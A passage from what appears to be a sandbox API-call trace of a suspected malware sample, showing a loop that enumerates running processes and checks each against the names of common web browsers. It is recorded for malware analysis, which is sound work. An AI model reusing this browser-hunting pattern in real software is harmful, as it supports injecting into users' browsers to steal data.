lpString2="firefox.exe") returned -1 [0218.609] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0218.609] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0218.609] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0218.609] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0218.610] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0218.610] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0218.610] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0218.610] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0218.610] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0218.610] CloseHandle (hObject=0xd4) returned 1 [0218.610] Sleep (dwMilliseconds=0x3e8) [0219.610] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0219.613] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0219.613] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0219.614] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0219.614] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0219.614] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0219.614] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0219.614] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0219.614] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0219.614] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0219.614] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0219.614] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0219.615] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0219.615] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0219.615] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0219.615] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0219.615] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0219.615] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0219.615] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0219.615] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0219.615] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0219.615] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0219.616] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0219.616] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0219.616] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0219.616] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0219.616] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0219.616] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0219.616] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0219.616] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0219.616] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0219.617] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0219.617] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0219.617] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0219.617] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0219.617] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0219.617] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0219.618] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0219.618] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0219.618] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0219.618] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0219.618] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0219.618] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0219.618] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0219.618] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0219.618] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0219.618] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0219.619] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0219.619] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0219.619] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0219.619] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0219.619] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.619] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0219.619] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0219.619] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0219.619] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0219.619] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.620] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0219.620] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0219.620] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0219.620] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0219.620] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.620] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0219.620] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0219.620] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0219.620] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0219.621] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.621] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0219.621] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0219.621] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0219.621] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0219.621] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.622] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0219.622] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0219.622] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0219.622] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0219.622] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0219.622] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0219.622] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0219.622] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0219.622] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0219.622] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.623] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0219.623] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0219.623] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0219.623] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0219.623] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.623] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0219.623] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0219.623] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0219.623] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0219.623] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0219.624] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0219.624] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0219.624] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0219.624] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0219.624] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0219.624] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0219.624] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0219.624] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0219.624] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0219.625] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0219.625] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0219.625] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0219.625] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0219.625] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0219.625] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.626] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0219.626] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0219.626] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0219.626] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0219.626] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0219.626] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0219.626] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0219.626] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0219.626] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0219.626] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0219.627] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0219.627] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0219.627] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0219.627] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0219.627] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0219.627] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0219.627] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0219.627] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0219.627] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0219.627] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0219.628] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0219.628] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0219.628] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0219.628] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0219.628] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0219.628] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0219.628] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0219.629] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0219.629] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0219.629] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0219.629] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0219.629] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0219.629] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0219.629] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0219.629] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0219.630] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0219.630] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0219.630] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0219.630] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0219.630] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0219.630] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0219.630] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0219.630] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0219.630] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0219.630] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0219.631] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0219.631] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0219.631] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0219.631] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0219.631] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0219.631] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0219.631] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0219.631] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0219.631] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0219.631] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0219.632] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0219.632] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0219.632] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0219.632] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0219.632] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0219.632] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0219.633] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0219.633] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0219.633] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0219.633] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0219.633] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0219.633] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0219.633] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0219.633] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0219.633] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0219.634] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0219.634] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0219.634] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0219.634] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0219.634] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0219.634] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0219.634] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0219.634] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0219.634] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0219.634] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0219.635] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0219.635] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0219.635] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0219.635] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0219.635] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0219.635] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0219.635] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 